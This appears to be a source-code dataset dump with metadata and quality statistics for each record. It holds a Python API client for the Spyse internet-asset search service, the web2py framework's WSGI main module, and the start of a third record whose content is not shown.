0.040816
false
0.081633
0.081633
0
0.163265
0.102041
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5d8dbbff6df38e6773044260538db7a759525964
16,585
py
Python
spyse/client.py
fabaff/spyse-python
f286514ac052ebe6fa98f877d251d8f3cd4db1c4
[ "MIT" ]
9
2021-07-28T11:59:07.000Z
2022-02-17T02:25:06.000Z
spyse/client.py
fabaff/spyse-python
f286514ac052ebe6fa98f877d251d8f3cd4db1c4
[ "MIT" ]
2
2021-11-27T02:03:03.000Z
2022-02-02T11:33:34.000Z
spyse/client.py
fabaff/spyse-python
f286514ac052ebe6fa98f877d251d8f3cd4db1c4
[ "MIT" ]
7
2021-08-05T04:02:09.000Z
2022-03-04T14:11:04.000Z
import requests from typing import List, Optional from .models import AS, Domain, IP, CVE, Account, Certificate, Email, DNSHistoricalRecord, WHOISHistoricalRecord from .response import Response from .search_query import SearchQuery from limiter import get_limiter, limit class DomainsSearchResults: def __init__(self, results: List[Domain], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[Domain] = results class AutonomousSystemsSearchResults: def __init__(self, results: List[AS], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[AS] = results class IPSearchResults: def __init__(self, results: List[IP], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[IP] = results class CertificatesSearchResults: def __init__(self, results: List[Certificate], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[Certificate] = results class CVESearchResults: def __init__(self, results: List[CVE], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[CVE] = results class EmailsSearchResults: def __init__(self, results: List[Email], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[Email] = results class HistoricalDNSSearchResults: def __init__(self, results: List[DNSHistoricalRecord], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[DNSHistoricalRecord] = results class HistoricalWHOISSearchResults: def __init__(self, results: List[WHOISHistoricalRecord], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[WHOISHistoricalRecord] = results class Client: DEFAULT_BASE_URL = 'https://api.spyse.com/v4/data' MAX_LIMIT = 100 SEARCH_RESULTS_LIMIT = 10000 RATE_LIMIT_FRAME_IN_SECONDS = 1 def __init__(self, api_token, base_url=DEFAULT_BASE_URL): self.session = requests.Session() self.session.headers.update({'Authorization': 'Bearer ' + api_token}) self.session.headers.update({'User-Agent': 'spyse-python'}) self.base_url = base_url self.limiter = get_limiter(rate=self.RATE_LIMIT_FRAME_IN_SECONDS, capacity=1) self.account = self.get_quotas() self.limiter._capacity = self.account.requests_rate_limit def __get(self, endpoint: str) -> Response: with limit(self.limiter, consume=1): return Response.from_dict(self.session.get(endpoint).json()) def __search(self, endpoint, query: SearchQuery, lim: int = MAX_LIMIT, offset: int = 0) -> Response: with limit(self.limiter, consume=1): return Response.from_dict(self.session.post(endpoint, json={"search_params": query.get(), "limit": lim, "offset": offset}).json()) def __scroll(self, endpoint, query: SearchQuery, search_id: Optional[str] = None) -> Response: with limit(self.limiter, consume=1): if search_id: body = {"search_params": query.get(), "search_id": search_id} else: body = {"search_params": query.get()} return Response.from_dict(self.session.post(endpoint, json=body).json()) def set_user_agent(self, s: str): self.session.headers.update({'User-Agent': s}) def get_quotas(self) -> Optional[Account]: """Returns details about your account quotas.""" response = self.__get('{}/account/quota'.format(self.base_url)) response.check_errors() return Account.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def get_autonomous_system_details(self, asn: int) -> Optional[AS]: """Returns details about an autonomous system by AS number.""" response = self.__get('{}/as/{}'.format(self.base_url, asn)) response.check_errors() return AS.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def count_autonomous_systems(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/as/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def search_autonomous_systems(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> AutonomousSystemsSearchResults: """ Returns a list of autonomous systems that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/as/search'.format(self.base_url), query, limit, offset) response.check_errors() as_list = list() for r in response.data.items: as_list.append(AS.from_dict(r)) return AutonomousSystemsSearchResults(as_list, response.data.total_items) def scroll_autonomous_systems(self, query: SearchQuery, scroll_id: str = None) -> AutonomousSystemsSearchResults: """ Returns a list of autonomous systems that matched the search query. Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/as/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() as_list = list() for r in response.data.items: as_list.append(AS.from_dict(r)) return AutonomousSystemsSearchResults(as_list, search_id=response.data.search_id) def get_domain_details(self, domain_name: str) -> Optional[Domain]: """Returns details about domain""" response = self.__get('{}/domain/{}'.format(self.base_url, domain_name)) response.check_errors() return Domain.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_domains(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> DomainsSearchResults: """ Returns a list of domains that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/domain/search'.format(self.base_url), query, limit, offset) response.check_errors() domains = list() for r in response.data.items: domains.append(Domain.from_dict(r)) return DomainsSearchResults(domains, response.data.total_items) def count_domains(self, query: SearchQuery): """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/domain/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_domains(self, query: SearchQuery, scroll_id: str = None) -> DomainsSearchResults: """ Returns a list of domains that matched the search query. Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/domain/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() domains = list() for r in response.data.items: domains.append(Domain.from_dict(r)) return DomainsSearchResults(domains, search_id=response.data.search_id) def get_ip_details(self, ip: str) -> Optional[IP]: """Returns details about IP""" response = self.__get('{}/ip/{}'.format(self.base_url, ip)) response.check_errors() return IP.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_ip(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> IPSearchResults: """ Returns a list of IPv4 hosts that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/ip/search'.format(self.base_url), query, limit, offset) response.check_errors() ips = list() for r in response.data.items: ips.append(IP.from_dict(r)) return IPSearchResults(ips, response.data.total_items) def count_ip(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/ip/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_ip(self, query: SearchQuery, scroll_id: str = None) -> IPSearchResults: """ Returns a list of IPv4 hosts that matched the search query. Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/ip/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() ips = list() for r in response.data.items: ips.append(IP.from_dict(r)) return IPSearchResults(ips, search_id=response.data.search_id) def get_certificate_details(self, fingerprint_sha256: str) -> Optional[Certificate]: """Returns details about SSL/TLS certificate""" response = self.__get('{}/certificate/{}'.format(self.base_url, fingerprint_sha256)) response.check_errors() return Certificate.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_certificate(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> CertificatesSearchResults: """ Returns a list of SSL/TLS certificate hosts that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/certificate/search'.format(self.base_url), query, limit, offset) response.check_errors() certs = list() for r in response.data.items: certs.append(Certificate.from_dict(r)) return CertificatesSearchResults(certs, response.data.total_items) def count_certificate(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/certificate/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_certificate(self, query: SearchQuery, scroll_id: str = None) -> CertificatesSearchResults: """ Returns a list of SSL/TLS certificates that matched the search query. Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/certificate/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() certs = list() for r in response.data.items: certs.append(Certificate.from_dict(r)) return CertificatesSearchResults(certs, search_id=response.data.search_id) def get_cve_details(self, cve_id: str) -> Optional[CVE]: """Returns details about CVE""" response = self.__get('{}/cve/{}'.format(self.base_url, cve_id)) response.check_errors() return CVE.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_cve(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> CVESearchResults: """ Returns a list of CVE that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/cve/search'.format(self.base_url), query, limit, offset) response.check_errors() cve_list = list() for r in response.data.items: cve_list.append(CVE.from_dict(r)) return CVESearchResults(cve_list, response.data.total_items) def count_cve(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/cve/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_cve(self, query: SearchQuery, scroll_id: str = None) -> CVESearchResults: """ Returns a list of CVEs that matched the search query. Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/cve/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() cve_list = list() for r in response.data.items: cve_list.append(CVE.from_dict(r)) return CVESearchResults(cve_list, search_id=response.data.search_id) def get_email_details(self, email: str) -> Optional[Email]: """Returns details about email""" response = self.__get('{}/email/{}'.format(self.base_url, email)) response.check_errors() return Email.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_emails(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> EmailsSearchResults: """ Returns a list of emails that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/email/search'.format(self.base_url), query, limit, offset) response.check_errors() emails = list() for r in response.data.items: emails.append(Email.from_dict(r)) return EmailsSearchResults(emails, response.data.total_items) def count_emails(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/cve/email/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_emails(self, query: SearchQuery, scroll_id: str = None) -> EmailsSearchResults: """ Returns a list of emails that matched the search query. Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/email/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() emails = list() for r in response.data.items: emails.append(Email.from_dict(r)) return EmailsSearchResults(emails, search_id=response.data.search_id) def search_historical_dns(self, dns_type, domain_name: str, limit: int = MAX_LIMIT, offset: int = 0) \ -> HistoricalDNSSearchResults: """ Returns the historical DNS records about the given domain name. """ response = self.__get(f'{self.base_url}/history/dns/{dns_type}/{domain_name}?limit={limit}&offset={offset}') response.check_errors() records = list() for r in response.data.items: records.append(DNSHistoricalRecord.from_dict(r)) return HistoricalDNSSearchResults(records, response.data.total_items) def search_historical_whois(self, domain_name: str, limit: int = MAX_LIMIT, offset: int = 0) \ -> HistoricalWHOISSearchResults: """ Returns the historical WHOIS records for the given domain name. """ response = self.__get(f'{self.base_url}/history/domain-whois/{domain_name}?limit={limit}&offset={offset}') response.check_errors() records = list() for r in response.data.items: records.append(WHOISHistoricalRecord.from_dict(r)) return HistoricalWHOISSearchResults(records, response.data.total_items)
42.308673
117
0.662466
2,039
16,585
5.207945
0.071604
0.054242
0.029005
0.040023
0.743479
0.699972
0.67125
0.636689
0.627084
0.614559
0
0.00586
0.228339
16,585
391
118
42.41688
0.823879
0.136087
0
0.4
0
0.008696
0.052369
0.022031
0
0
0
0
0
1
0.173913
false
0
0.026087
0
0.386957
0.008696
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5d8fd5fa2bcd3f5669762aabbd18717b761f3d16
30,184
py
Python
gluon/main.py
scudette/rekall-agent-server
e553f1ae5279f75a8f5b0c0c4847766b60ed86eb
[ "BSD-3-Clause" ]
21
2018-02-16T17:43:59.000Z
2021-12-29T12:08:28.000Z
gluon/main.py
scudette/rekall-agent-server
e553f1ae5279f75a8f5b0c0c4847766b60ed86eb
[ "BSD-3-Clause" ]
12
2017-11-01T14:54:29.000Z
2018-02-01T22:02:12.000Z
gluon/main.py
scudette/rekall-agent-server
e553f1ae5279f75a8f5b0c0c4847766b60ed86eb
[ "BSD-3-Clause" ]
8
2018-10-08T03:48:00.000Z
2022-03-31T12:13:01.000Z
#!/bin/env python # -*- coding: utf-8 -*- """ | This file is part of the web2py Web Framework | Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu> | License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) The gluon wsgi application --------------------------- """ from __future__ import print_function if False: import import_all # DO NOT REMOVE PART OF FREEZE PROCESS import gc import os import re import copy import sys import time import datetime import signal import socket import random import string from gluon._compat import Cookie, urllib2 #from thread import allocate_lock from gluon.fileutils import abspath, write_file from gluon.settings import global_settings from gluon.utils import web2py_uuid from gluon.admin import add_path_first, create_missing_folders, create_missing_app_folders from gluon.globals import current # Remarks: # calling script has inserted path to script directory into sys.path # applications_parent (path to applications/, site-packages/ etc) # defaults to that directory set sys.path to # ("", gluon_parent/site-packages, gluon_parent, ...) # # this is wrong: # web2py_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # because we do not want the path to this file which may be Library.zip # gluon_parent is the directory containing gluon, web2py.py, logging.conf # and the handlers. # applications_parent (web2py_path) is the directory containing applications/ # and routes.py # The two are identical unless web2py_path is changed via the web2py.py -f folder option # main.web2py_path is the same as applications_parent (for backward compatibility) web2py_path = global_settings.applications_parent # backward compatibility create_missing_folders() # set up logging for subsequent imports import logging import logging.config # This needed to prevent exception on Python 2.5: # NameError: name 'gluon' is not defined # See http://bugs.python.org/issue1436 # attention!, the import Tkinter in messageboxhandler, changes locale ... import gluon.messageboxhandler logging.gluon = gluon # so we must restore it! Thanks ozancag import locale locale.setlocale(locale.LC_CTYPE, "C") # IMPORTANT, web2py requires locale "C" exists = os.path.exists pjoin = os.path.join try: logging.config.fileConfig(abspath("logging.conf")) except: # fails on GAE or when logfile is missing logging.basicConfig() logger = logging.getLogger("web2py") from gluon.restricted import RestrictedError from gluon.http import HTTP, redirect from gluon.globals import Request, Response, Session from gluon.compileapp import build_environment, run_models_in, \ run_controller_in, run_view_in from gluon.contenttype import contenttype from pydal.base import BaseAdapter from gluon.validators import CRYPT from gluon.html import URL, xmlescape from gluon.utils import is_valid_ip_address, getipaddrinfo from gluon.rewrite import load as load_routes, url_in, THREAD_LOCAL as rwthread, \ try_rewrite_on_error, fixup_missing_path_info from gluon import newcron __all__ = ['wsgibase', 'save_password', 'appfactory', 'HttpServer'] requests = 0 # gc timer # Security Checks: validate URL and session_id here, # accept_language is validated in languages # pattern used to validate client address regex_client = re.compile('[\w\-:]+(\.[\w\-]+)*\.?') # ## to account for IPV6 try: version_info = open(pjoin(global_settings.gluon_parent, 'VERSION'), 'r') raw_version_string = version_info.read().split()[-1].strip() version_info.close() global_settings.web2py_version = raw_version_string web2py_version = global_settings.web2py_version except: raise RuntimeError("Cannot determine web2py version") try: from gluon import rocket except: if not global_settings.web2py_runtime_gae: logger.warn('unable to import Rocket') load_routes() HTTPS_SCHEMES = set(('https', 'HTTPS')) def get_client(env): """ Guesses the client address from the environment variables First tries 'http_x_forwarded_for', secondly 'remote_addr' if all fails, assume '127.0.0.1' or '::1' (running locally) """ eget = env.get g = regex_client.search(eget('http_x_forwarded_for', '')) client = (g.group() or '').split(',')[0] if g else None if client in (None, '', 'unknown'): g = regex_client.search(eget('remote_addr', '')) if g: client = g.group() elif env.http_host.startswith('['): # IPv6 client = '::1' else: client = '127.0.0.1' # IPv4 if not is_valid_ip_address(client): raise HTTP(400, "Bad Request (request.client=%s)" % client) return client def serve_controller(request, response, session): """ This function is used to generate a dynamic page. It first runs all models, then runs the function in the controller, and then tries to render the output using a view/template. this function must run from the [application] folder. A typical example would be the call to the url /[application]/[controller]/[function] that would result in a call to [function]() in applications/[application]/[controller].py rendered by applications/[application]/views/[controller]/[function].html """ # ################################################## # build environment for controller and view # ################################################## environment = build_environment(request, response, session) # set default view, controller can override it response.view = '%s/%s.%s' % (request.controller, request.function, request.extension) # also, make sure the flash is passed through # ################################################## # process models, controller and view (if required) # ################################################## run_models_in(environment) response._view_environment = copy.copy(environment) page = run_controller_in(request.controller, request.function, environment) if isinstance(page, dict): response._vars = page response._view_environment.update(page) page = run_view_in(response._view_environment) # logic to garbage collect after exec, not always, once every 100 requests global requests requests = ('requests' in globals()) and (requests + 1) % 100 or 0 if not requests: gc.collect() # end garbage collection logic # ################################################## # set default headers it not set # ################################################## default_headers = [ ('Content-Type', contenttype('.' + request.extension)), ('Cache-Control', 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'), ('Expires', time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())), ('Pragma', 'no-cache')] for key, value in default_headers: response.headers.setdefault(key, value) raise HTTP(response.status, page, **response.headers) class LazyWSGI(object): def __init__(self, environ, request, response): self.wsgi_environ = environ self.request = request self.response = response @property def environ(self): if not hasattr(self, '_environ'): new_environ = self.wsgi_environ new_environ['wsgi.input'] = self.request.body new_environ['wsgi.version'] = 1 self._environ = new_environ return self._environ def start_response(self, status='200', headers=[], exec_info=None): """ in controller you can use: - request.wsgi.environ - request.wsgi.start_response to call third party WSGI applications """ self.response.status = str(status).split(' ', 1)[0] self.response.headers = dict(headers) return lambda *args, **kargs: \ self.response.write(escape=False, *args, **kargs) def middleware(self, *middleware_apps): """ In you controller use:: @request.wsgi.middleware(middleware1, middleware2, ...) to decorate actions with WSGI middleware. actions must return strings. uses a simulated environment so it may have weird behavior in some cases """ def middleware(f): def app(environ, start_response): data = f() start_response(self.response.status, self.response.headers.items()) if isinstance(data, list): return data return [data] for item in middleware_apps: app = item(app) def caller(app): return app(self.environ, self.start_response) return lambda caller=caller, app=app: caller(app) return middleware def wsgibase(environ, responder): """ The gluon wsgi application. The first function called when a page is requested (static or dynamic). It can be called by paste.httpserver or by apache mod_wsgi (or any WSGI-compatible server). - fills request with info - the environment variables, replacing '.' with '_' - adds web2py path and version info - compensates for fcgi missing path_info and query_string - validates the path in url The url path must be either: 1. for static pages: - /<application>/static/<file> 2. for dynamic pages: - /<application>[/<controller>[/<function>[/<sub>]]][.<extension>] The naming conventions are: - application, controller, function and extension may only contain `[a-zA-Z0-9_]` - file and sub may also contain '-', '=', '.' and '/' """ eget = environ.get current.__dict__.clear() request = Request(environ) response = Response() session = Session() env = request.env #env.web2py_path = global_settings.applications_parent env.web2py_version = web2py_version #env.update(global_settings) static_file = False http_response = None try: try: try: # ################################################## # handle fcgi missing path_info and query_string # select rewrite parameters # rewrite incoming URL # parse rewritten header variables # parse rewritten URL # serve file if static # ################################################## fixup_missing_path_info(environ) (static_file, version, environ) = url_in(request, environ) response.status = env.web2py_status_code or response.status if static_file: if eget('QUERY_STRING', '').startswith('attachment'): response.headers['Content-Disposition'] \ = 'attachment' if version: response.headers['Cache-Control'] = 'max-age=315360000' response.headers[ 'Expires'] = 'Thu, 31 Dec 2037 23:59:59 GMT' response.stream(static_file, request=request) # ################################################## # fill in request items # ################################################## app = request.application # must go after url_in! if not global_settings.local_hosts: local_hosts = set(['127.0.0.1', '::ffff:127.0.0.1', '::1']) if not global_settings.web2py_runtime_gae: try: fqdn = socket.getfqdn() local_hosts.add(socket.gethostname()) local_hosts.add(fqdn) local_hosts.update([ addrinfo[4][0] for addrinfo in getipaddrinfo(fqdn)]) if env.server_name: local_hosts.add(env.server_name) local_hosts.update([ addrinfo[4][0] for addrinfo in getipaddrinfo(env.server_name)]) except (socket.gaierror, TypeError): pass global_settings.local_hosts = list(local_hosts) else: local_hosts = global_settings.local_hosts client = get_client(env) x_req_with = str(env.http_x_requested_with).lower() cmd_opts = global_settings.cmd_options request.update( client = client, folder = abspath('applications', app) + os.sep, ajax = x_req_with == 'xmlhttprequest', cid = env.http_web2py_component_element, is_local = (env.remote_addr in local_hosts and client == env.remote_addr), is_shell = False, is_scheduler = False, is_https = env.wsgi_url_scheme in HTTPS_SCHEMES or \ request.env.http_x_forwarded_proto in HTTPS_SCHEMES \ or env.https == 'on' ) request.url = environ['PATH_INFO'] # ################################################## # access the requested application # ################################################## disabled = pjoin(request.folder, 'DISABLED') if not exists(request.folder): if app == rwthread.routes.default_application \ and app != 'welcome': redirect(URL('welcome', 'default', 'index')) elif rwthread.routes.error_handler: _handler = rwthread.routes.error_handler redirect(URL(_handler['application'], _handler['controller'], _handler['function'], args=app)) else: raise HTTP(404, rwthread.routes.error_message % 'invalid request', web2py_error='invalid application') elif not request.is_local and exists(disabled): five0three = os.path.join(request.folder,'static','503.html') if os.path.exists(five0three): raise HTTP(503, file(five0three, 'r').read()) else: raise HTTP(503, "<html><body><h1>Temporarily down for maintenance</h1></body></html>") # ################################################## # build missing folders # ################################################## create_missing_app_folders(request) # ################################################## # get the GET and POST data # ################################################## #parse_get_post_vars(request, environ) # ################################################## # expose wsgi hooks for convenience # ################################################## request.wsgi = LazyWSGI(environ, request, response) # ################################################## # load cookies # ################################################## if env.http_cookie: for single_cookie in env.http_cookie.split(';'): single_cookie = single_cookie.strip() if single_cookie: try: request.cookies.load(single_cookie) except Cookie.CookieError: pass # single invalid cookie ignore # ################################################## # try load session or create new session file # ################################################## if not env.web2py_disable_session: session.connect(request, response) # ################################################## # run controller # ################################################## if global_settings.debugging and app != "admin": import gluon.debug # activate the debugger gluon.debug.dbg.do_debug(mainpyfile=request.folder) serve_controller(request, response, session) except HTTP as hr: http_response = hr if static_file: return http_response.to(responder, env=env) if request.body: request.body.close() if hasattr(current, 'request'): # ################################################## # on success, try store session in database # ################################################## if not env.web2py_disable_session: session._try_store_in_db(request, response) # ################################################## # on success, commit database # ################################################## if response.do_not_commit is True: BaseAdapter.close_all_instances(None) elif response.custom_commit: BaseAdapter.close_all_instances(response.custom_commit) else: BaseAdapter.close_all_instances('commit') # ################################################## # if session not in db try store session on filesystem # this must be done after trying to commit database! # ################################################## if not env.web2py_disable_session: session._try_store_in_cookie_or_file(request, response) # Set header so client can distinguish component requests. if request.cid: http_response.headers.setdefault( 'web2py-component-content', 'replace') if request.ajax: if response.flash: http_response.headers['web2py-component-flash'] = \ urllib2.quote(xmlescape(response.flash).replace(b'\n', b'')) if response.js: http_response.headers['web2py-component-command'] = \ urllib2.quote(response.js.replace('\n', '')) # ################################################## # store cookies in headers # ################################################## session._fixup_before_save() http_response.cookies2headers(response.cookies) ticket = None except RestrictedError as e: if request.body: request.body.close() # ################################################## # on application error, rollback database # ################################################## # log tickets before rollback if not in DB if not request.tickets_db: ticket = e.log(request) or 'unknown' # rollback if response._custom_rollback: response._custom_rollback() else: BaseAdapter.close_all_instances('rollback') # if tickets in db, reconnect and store it in db if request.tickets_db: ticket = e.log(request) or 'unknown' http_response = \ HTTP(500, rwthread.routes.error_message_ticket % dict(ticket=ticket), web2py_error='ticket %s' % ticket) except: if request.body: request.body.close() # ################################################## # on application error, rollback database # ################################################## try: if response._custom_rollback: response._custom_rollback() else: BaseAdapter.close_all_instances('rollback') except: pass e = RestrictedError('Framework', '', '', locals()) ticket = e.log(request) or 'unrecoverable' http_response = \ HTTP(500, rwthread.routes.error_message_ticket % dict(ticket=ticket), web2py_error='ticket %s' % ticket) finally: if response and hasattr(response, 'session_file') \ and response.session_file: response.session_file.close() session._unlock(response) http_response, new_environ = try_rewrite_on_error( http_response, request, environ, ticket) if not http_response: return wsgibase(new_environ, responder) if global_settings.web2py_crontype == 'soft': newcron.softcron(global_settings.applications_parent).start() return http_response.to(responder, env=env) def save_password(password, port): """ Used by main() to save the password in the parameters_port.py file. """ password_file = abspath('parameters_%i.py' % port) if password == '<random>': # make up a new password chars = string.letters + string.digits password = ''.join([random.choice(chars) for _ in range(8)]) cpassword = CRYPT()(password)[0] print('******************* IMPORTANT!!! ************************') print('your admin password is "%s"' % password) print('*********************************************************') elif password == '<recycle>': # reuse the current password if any if exists(password_file): return else: password = '' elif password.startswith('<pam_user:'): # use the pam password for specified user cpassword = password[1:-1] else: # use provided password cpassword = CRYPT()(password)[0] fp = open(password_file, 'w') if password: fp.write('password="%s"\n' % cpassword) else: fp.write('password=None\n') fp.close() def appfactory(wsgiapp=wsgibase, logfilename='httpserver.log', profiler_dir=None, profilerfilename=None): """ generates a wsgi application that does logging and profiling and calls wsgibase Args: wsgiapp: the base application logfilename: where to store apache-compatible requests log profiler_dir: where to store profile files """ if profilerfilename is not None: raise BaseException("Deprecated API") if profiler_dir: profiler_dir = abspath(profiler_dir) logger.warn('profiler is on. will use dir %s', profiler_dir) if not os.path.isdir(profiler_dir): try: os.makedirs(profiler_dir) except: raise BaseException("Can't create dir %s" % profiler_dir) filepath = pjoin(profiler_dir, 'wtest') try: filehandle = open( filepath, 'w' ) filehandle.close() os.unlink(filepath) except IOError: raise BaseException("Unable to write to dir %s" % profiler_dir) def app_with_logging(environ, responder): """ a wsgi app that does logging and profiling and calls wsgibase """ status_headers = [] def responder2(s, h): """ wsgi responder app """ status_headers.append(s) status_headers.append(h) return responder(s, h) time_in = time.time() ret = [0] if not profiler_dir: ret[0] = wsgiapp(environ, responder2) else: import cProfile prof = cProfile.Profile() prof.enable() ret[0] = wsgiapp(environ, responder2) prof.disable() destfile = pjoin(profiler_dir, "req_%s.prof" % web2py_uuid()) prof.dump_stats(destfile) try: line = '%s, %s, %s, %s, %s, %s, %f\n' % ( environ['REMOTE_ADDR'], datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), environ['REQUEST_METHOD'], environ['PATH_INFO'].replace(',', '%2C'), environ['SERVER_PROTOCOL'], (status_headers[0])[:3], time.time() - time_in, ) if not logfilename: sys.stdout.write(line) elif isinstance(logfilename, str): write_file(logfilename, line, 'a') else: logfilename.write(line) except: pass return ret[0] return app_with_logging class HttpServer(object): """ the web2py web server (Rocket) """ def __init__( self, ip='127.0.0.1', port=8000, password='', pid_filename='httpserver.pid', log_filename='httpserver.log', profiler_dir=None, ssl_certificate=None, ssl_private_key=None, ssl_ca_certificate=None, min_threads=None, max_threads=None, server_name=None, request_queue_size=5, timeout=10, socket_timeout=1, shutdown_timeout=None, # Rocket does not use a shutdown timeout path=None, interfaces=None # Rocket is able to use several interfaces - must be list of socket-tuples as string ): """ starts the web server. """ if interfaces: # if interfaces is specified, it must be tested for rocket parameter correctness # not necessarily completely tested (e.g. content of tuples or ip-format) import types if isinstance(interfaces, list): for i in interfaces: if not isinstance(i, tuple): raise "Wrong format for rocket interfaces parameter - see http://packages.python.org/rocket/" else: raise "Wrong format for rocket interfaces parameter - see http://packages.python.org/rocket/" if path: # if a path is specified change the global variables so that web2py # runs from there instead of cwd or os.environ['web2py_path'] global web2py_path path = os.path.normpath(path) web2py_path = path global_settings.applications_parent = path os.chdir(path) load_routes() for p in (path, abspath('site-packages'), ""): add_path_first(p) if exists("logging.conf"): logging.config.fileConfig("logging.conf") save_password(password, port) self.pid_filename = pid_filename if not server_name: server_name = socket.gethostname() logger.info('starting web server...') rocket.SERVER_NAME = server_name rocket.SOCKET_TIMEOUT = socket_timeout sock_list = [ip, port] if not ssl_certificate or not ssl_private_key: logger.info('SSL is off') elif not rocket.ssl: logger.warning('Python "ssl" module unavailable. SSL is OFF') elif not exists(ssl_certificate): logger.warning('unable to open SSL certificate. SSL is OFF') elif not exists(ssl_private_key): logger.warning('unable to open SSL private key. SSL is OFF') else: sock_list.extend([ssl_private_key, ssl_certificate]) if ssl_ca_certificate: sock_list.append(ssl_ca_certificate) logger.info('SSL is ON') app_info = {'wsgi_app': appfactory(wsgibase, log_filename, profiler_dir)} self.server = rocket.Rocket(interfaces or tuple(sock_list), method='wsgi', app_info=app_info, min_threads=min_threads, max_threads=max_threads, queue_size=int(request_queue_size), timeout=int(timeout), handle_signals=False, ) def start(self): """ start the web server """ try: signal.signal(signal.SIGTERM, lambda a, b, s=self: s.stop()) signal.signal(signal.SIGINT, lambda a, b, s=self: s.stop()) except: pass write_file(self.pid_filename, str(os.getpid())) self.server.start() def stop(self, stoplogging=False): """ stop cron and the web server """ newcron.stopcron() self.server.stop(stoplogging) try: os.unlink(self.pid_filename) except: pass
37.919598
117
0.52286
2,993
30,184
5.130638
0.213498
0.006187
0.006512
0.001954
0.133498
0.102631
0.086806
0.065642
0.060042
0.054572
0
0.009227
0.332163
30,184
795
118
37.967296
0.752555
0.190465
0
0.173554
0
0.004132
0.082748
0.010462
0
0
0
0
0
1
0.035124
false
0.051653
0.082645
0.002066
0.152893
0.008264
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5d96fee6a1d130e8653363f3a24275073276610b
1,496
py
Python
app/__init__.py
dulin/tornado-test
8ceeb9f2b50b4cd0f18baa9149140721feec1925
[ "MIT" ]
null
null
null
app/__init__.py
dulin/tornado-test
8ceeb9f2b50b4cd0f18baa9149140721feec1925
[ "MIT" ]
null
null
null
app/__init__.py
dulin/tornado-test
8ceeb9f2b50b4cd0f18baa9149140721feec1925
[ "MIT" ]
null
null
null
